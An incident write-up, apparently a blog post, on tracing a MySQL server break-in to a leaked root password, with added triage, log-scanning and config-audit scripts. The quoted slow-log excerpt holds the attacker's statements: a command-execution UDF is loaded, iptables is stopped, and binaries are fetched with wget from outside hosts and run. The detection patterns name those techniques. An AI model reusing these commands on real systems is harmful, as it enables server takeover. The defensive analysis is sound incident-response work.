#### Symptoms
- A lot of oddly named processes (the screenshot from the incident itself was not kept; this one was reproduced by me afterwards):
![image](http://img.blog.csdn.net/20160928082801322)
##### Investigation step 1: find where the process binary lives
Use the command
```
# ll is the usual alias for ls -l; replace <pid> with the suspicious process id
ls -l /proc/<pid>
# the exe entry is a symlink to the binary that was actually executed
ls -l /proc/<pid>/exe
```
to read the exe path of the process. Opening that directory left me stunned: the mysql directory and the mysql/data directory had gained a lot of strange .so files and executables:
![take a break](http://img.blog.csdn.net/20160928082623163)
![image](http://img.blog.csdn.net/20160928082700165)
##### Investigation step 2: kill the processes and delete the files right away
- Killing processes in bulk: a readable way to batch-kill processes that I saw on [stackoverflow](http://stackoverflow.com/questions/3510673/find-and-kill-a-process-in-one-line-using-bash-and-regex/3510850#3510850):
```
kill `ps -ef | grep [s]leep | awk '{print $2}'`
```
Explanation:
- the `[s]leep` pattern keeps grep from matching its own command line, so no `grep -v grep` is needed
- `awk '{print $2}'` prints only the second column, the process id
- the backticks are shell command substitution: the command's output is substituted in its place
- `kill` then receives every matching process id that grep found
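As an added example (not code from the original post), here is the triage of steps 1 and 2 as a few shell functions: list the processes whose binary resolves to a path under a directory you pass in (the MySQL data directory, whose path is assumed), spot binaries that were deleted after launch, list shared objects and executables sitting inside that directory, and print the kill commands for review instead of running them. It assumes a Linux host with `/proc`. Note that the grep trick above matches any process whose command line contains the word, so the list is worth reading before anything is killed.

```shell
#!/bin/sh
# Added example, not from the original post: defender-side triage for steps 1
# and 2. Assumes a Linux host with /proc; the directory passed in is whatever
# MySQL uses as its data directory on your host (a placeholder path below).

# Print "<pid> <user> <exe>" for every process whose executable resolves to a
# path under DIR. A database data directory is never where a running binary
# should live, so every hit deserves a look. An exe ending in "(deleted)" was
# unlinked after it started, a common trick to hide the file on disk.
procs_exec_from_dir() {
    dir=$(readlink -f "$1") || return 1
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # other users' pids are unreadable
        case "$exe" in
            "$dir"/*) echo "${p#/proc/} $(stat -c %U "$p" 2>/dev/null || echo '?') $exe" ;;
        esac
    done
}

# Processes whose binary has been removed from disk while they keep running.
deleted_exe_procs() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            *" (deleted)") echo "${p#/proc/} $exe" ;;
        esac
    done
}

# Files that have no business in a data directory: shared objects and anything
# with an execute bit. The post found both kinds next to the table files.
suspicious_files_in_dir() {
    find "$1" -type f \( -name '*.so' -o -perm /111 \) 2>/dev/null
}

# Print, but do not run, the kill command for each match. Review the list and
# copy the binaries somewhere for analysis first, then drop the leading '#'.
kill_plan() {
    procs_exec_from_dir "$1" | while read -r pid user exe; do
        echo "# kill -9 $pid    # $user $exe"
    done
}

# Usage (placeholder path, adjust to your datadir):
#   procs_exec_from_dir /var/lib/mysql
#   suspicious_files_in_dir /var/lib/mysql
#   kill_plan /var/lib/mysql
```

`procs_exec_from_dir` only sees processes whose `/proc/<pid>/exe` link it is allowed to read, so run it as root when the trojan runs under another account (here it ran as `mysql`).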
##### Investigation step 3: change the root password & disable anonymous FTP
An ordinary attack could not have uploaded the trojan files, so my first suspicion was that the server password had leaked, someone had logged in with it, and then uploaded the trojan scripts. I changed the root password through the Aliyun console and rebooted the machine.
Another possibility was that the files came in over FTP; on checking, anonymous FTP login turned out to be enabled.
##### Investigation step 4: attacked again!!!
I assumed that changing the root password and rebooting the server had fixed it, but a day or two later Aliyun raised another alert, and the problem kept coming back every few days. I could not work out why. Eventually I noticed that the trojan processes were all started by the mysql user. An attack on MySQL should not be able to start processes on its own, and even with a SQL injection there would be no way to upload or download files, would there?
##### Investigation step 5: capture the evidence: turn on full MySQL query logging
Since the problem is in MySQL, log every query by setting the slow-log threshold to 0:
```
mysql --help | grep cnf          # find which my.cnf the server reads
vi /etc/my.cnf                   # add under the [mysqld] section:
[mysqld]
long_query_time=0                # 0 seconds: every statement is logged as "slow"
slow_query_log=ON
slow_query_log_file=/alidata/log/mysql/slow.log
# restart mysqld afterwards (or SET GLOBAL the same three variables)
```
##### Investigation step 5: analyze the log & the intrusion process
After watching it for a while, the slow.log made everything clear:
![image](http://img.blog.csdn.net/20160928183201292)
There were many strange operations, including exports with DUMPFILE:
```
-- create a table
create table if not exists tempMix4(data LONGBLOB);
-- step 1: set a variable
set @a = concat('', ...);   -- the rest of this statement was not preserved
-- step 2: insert it into the temporary table
INSERT INTO tempMix VALUES (@a);
-- load the function
# User@Host: root[root] @ [115.28.238.77] Id: 3
# Query_time: 0.001387 Lock_time: 0.000947 Rows_sent: 0 Rows_examined: 0
SET timestamp=1471084691;
CREATE FUNCTION sys_eval RETURNS string SONAME 'sys.so';
# User@Host: root[root] @ [115.28.238.77] Id: 3
# Query_time: 0.000213 Lock_time: 0.000113 Rows_sent: 0 Rows_examined: 0
SET timestamp=1471084691;
select sys_eval("wget http://www.zuimihu.cn/DDos;chmod 777 DDos;./DDos;");
# Time: 160831 3:51:28
# User@Host: root[root] @ [121.42.195.49] Id: 115
# Query_time: 2.444778 Lock_time: 0.000000 Rows_sent: 1 Rows_examined: 0
SET timestamp=1472586688;
select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.127.220.60:809/TSmmm;chmod 777 TSmmm;./TSmmm;");
```
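The log reading done by hand above can be automated. As an added example (not from the original post), the following shell functions pull out of a slow log in this format every statement that registers a UDF, calls a command-execution UDF, or reads or writes server-side files, and list the distinct clients that did not connect from the local machine. The sample log is constructed; the 203.0.113.x address is a documentation range, not a real client.

```shell
#!/bin/sh
# Added example, not from the original post: detection over a MySQL slow log
# in the format shown above (a "# User@Host:" header, then the statement).
# The sample log written by write_sample_log is constructed test data.

write_sample_log() {
    cat > "$1" <<'EOF'
# Time: 160831  3:51:28
# User@Host: root[root] @ localhost []  Id:    12
# Query_time: 0.000100  Lock_time: 0.000000 Rows_sent: 1  Rows_examined: 20
SET timestamp=1472586688;
select count(*) from orders;
# User@Host: root[root] @ [203.0.113.5]  Id:    13
# Query_time: 0.001387  Lock_time: 0.000947 Rows_sent: 0  Rows_examined: 0
SET timestamp=1472586690;
select data from tempMix into dumpfile 'sys.so';
# User@Host: root[root] @ [203.0.113.5]  Id:    13
# Query_time: 0.000213  Lock_time: 0.000113 Rows_sent: 0  Rows_examined: 0
SET timestamp=1472586691;
CREATE FUNCTION sys_eval RETURNS string SONAME 'sys.so';
# User@Host: root[root] @ [203.0.113.5]  Id:    13
# Query_time: 2.444778  Lock_time: 0.000000 Rows_sent: 1  Rows_examined: 0
SET timestamp=1472586692;
select sys_eval("id");
EOF
}

# Print "<user@host> | <statement>" for every statement that loads a UDF,
# calls a command-execution UDF, or reads/writes files on the server.
scan_mysql_log() {
    awk '
    /^# User@Host:/ { who = $0; sub(/^# User@Host: /, "", who); sub(/[ \t]+Id:.*$/, "", who); next }
    /^#/ || /^SET timestamp=/ { next }          # metadata lines, not statements
    {
        l = tolower($0)
        if (l ~ /create[ \t]+function.*soname/ ||
            l ~ /sys_(eval|exec)[ \t]*\(/ ||
            l ~ /into[ \t]+(dumpfile|outfile)/ ||
            l ~ /load_file[ \t]*\(/ ||
            l ~ /load[ \t]+data[ \t]+local/)
            print who " | " $0
    }' "$1"
}

# Distinct "<user> <ip>" pairs that connected from somewhere other than the
# local socket or loopback; the post's root cause was exactly such a login.
remote_mysql_clients() {
    awk '/^# User@Host:/ {
        rest = $0
        sub(/^.*@ /, "", rest)                  # "localhost []  Id: 12" or "[1.2.3.4]  Id: 13"
        i = index(rest, "["); j = index(rest, "]")
        if (i && j > i) {
            ip = substr(rest, i + 1, j - i - 1)
            if (ip != "" && ip != "127.0.0.1" && ip != "::1") print $3, ip
        }
    }' "$1" | sort -u
}

# Usage: scan_mysql_log /alidata/log/mysql/slow.log; remote_mysql_clients /alidata/log/mysql/slow.log
```

`remote_mysql_clients` is the quickest confirmation of the conclusion drawn in the next step: if root shows up with a non-local address, the account was used over the network.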
##### Investigation step 6: root cause analysis
Getting in through the application code is very unlikely; the only plausible explanation is that the MySQL root account's password leaked or was cracked. The slow log also shows that the client IPs were not the local machine, so the attacker logged in to MySQL remotely and launched the attack from there.
##### Investigation step 7: countermeasures
Passwords for core accounts must be sufficiently complex, kept secret and rotated regularly. Ideally restrict logins by IP, allow the root account to log in only from the local machine, and create separate low-privilege accounts for everything else.
In the week after changing the password and privileges the problem did not recur.
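The countermeasures above can be checked rather than remembered. As an added example (not from the original post), this shell script audits a my.cnf for the three settings that matter to this incident (network exposure, where `SELECT ... INTO OUTFILE/DUMPFILE` may write, and whether any statement history is kept), shows a weak configuration next to a corrected one, and prints the SQL that the account side of step 7 amounts to. The `datadir`, `secure_file_priv` path, `appdb` and `<strong-password>` values are placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: audit a my.cnf for the settings
# that made this intrusion easy. Only the [mysqld] section is read; '-' and
# '_' in option names are treated alike, as MySQL itself does.

# Print "key=value" for each option under [mysqld], normalized.
mysqld_settings() {
    awk '
    /^[ \t]*\[/ { in_mysqld = ($0 ~ /^[ \t]*\[mysqld\][ \t]*$/); next }
    in_mysqld && !/^[ \t]*([#;]|$)/ {
        line = $0; sub(/[ \t]+#.*$/, "", line)          # trailing comment
        eq = index(line, "=")
        if (eq) { key = substr(line, 1, eq - 1); val = substr(line, eq + 1) }
        else    { key = line; val = "" }                # bare options like skip-networking
        gsub(/[ \t]/, "", key); gsub(/-/, "_", key)
        gsub(/^[ \t]+|[ \t]+$/, "", val)
        print key "=" val
    }' "$1"
}

# Value of one option (the last occurrence wins, as in MySQL); empty if absent.
setting() {
    mysqld_settings "$1" | awk -F= -v k="$2" '$1 == k { v = substr($0, length(k) + 2) } END { print v }'
}
has_setting() { mysqld_settings "$1" | grep -q "^$2="; }
lower() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

# One finding per line; no output means the three checks passed.
audit_mycnf() {
    f=$1
    bind=$(setting "$f" bind_address)
    if ! has_setting "$f" skip_networking && [ "$bind" != "127.0.0.1" ] && [ "$bind" != "::1" ]; then
        echo "bind_address=${bind:-<unset>}: reachable from other hosts; bind to 127.0.0.1 unless remote clients are required"
    fi
    if [ -z "$(setting "$f" secure_file_priv)" ]; then
        echo "secure_file_priv unset: INTO OUTFILE/DUMPFILE and LOAD_FILE() may use any path the server can access"
    fi
    case $(lower "$(setting "$f" slow_query_log)") in
        1|on|true) ;;
        *) echo "slow_query_log off: no statement history to reconstruct what an account did" ;;
    esac
}

# Two constructed configs: the exposed shape and the corrected one.
write_weak_cnf() {
    cat > "$1" <<'EOF'
[mysqld]
datadir=/var/lib/mysql
bind-address = 0.0.0.0
[client]
port=3306
EOF
}
write_hardened_cnf() {
    cat > "$1" <<'EOF'
[mysqld]
datadir=/var/lib/mysql
bind-address = 127.0.0.1               # local clients only
secure_file_priv = /var/lib/mysql-files
slow_query_log = ON
long_query_time = 0                    # every statement, as in step 5
slow_query_log_file = /alidata/log/mysql/slow.log
EOF
}

# The account side of step 7 as SQL to run by hand. If 'root'@'localhost'
# already exists, DROP USER 'root'@'%' instead of renaming.
account_hardening_sql() {
    cat <<'EOF'
SELECT user, host FROM mysql.user WHERE host NOT IN ('localhost', '127.0.0.1', '::1');
RENAME USER 'root'@'%' TO 'root'@'localhost';
CREATE USER 'app'@'localhost' IDENTIFIED BY '<strong-password>';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'app'@'localhost';
SELECT name, dl FROM mysql.func;   -- any UDF you did not install yourself is a finding
EOF
}

# Usage: audit_mycnf /etc/my.cnf; account_hardening_sql
```

The last query matters for this incident in particular: `CREATE FUNCTION ... SONAME` leaves a row in `mysql.func`, so a registered `sys_eval` survives a password change and a reboot until it is dropped.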
#### Further reading
- [MySQL slow query log explained: parameters, configuration and analysis tools](http://mp.weixin.qq.com/s?__biz=MzI4NTA1MDEwNg==&mid=2650756876&idx=1&sn=d6c91752f05cfa0a3c55b4b3b433733a&chksm=f3f9e299c48e6b8f12f91018ce14a0e15acbffe8ce09f4c62a82661acd29abdce94723c13fc0&mpshare=1&scene=1&srcid=0929TCKiJ86ZAlthrUPVOs4s#rd)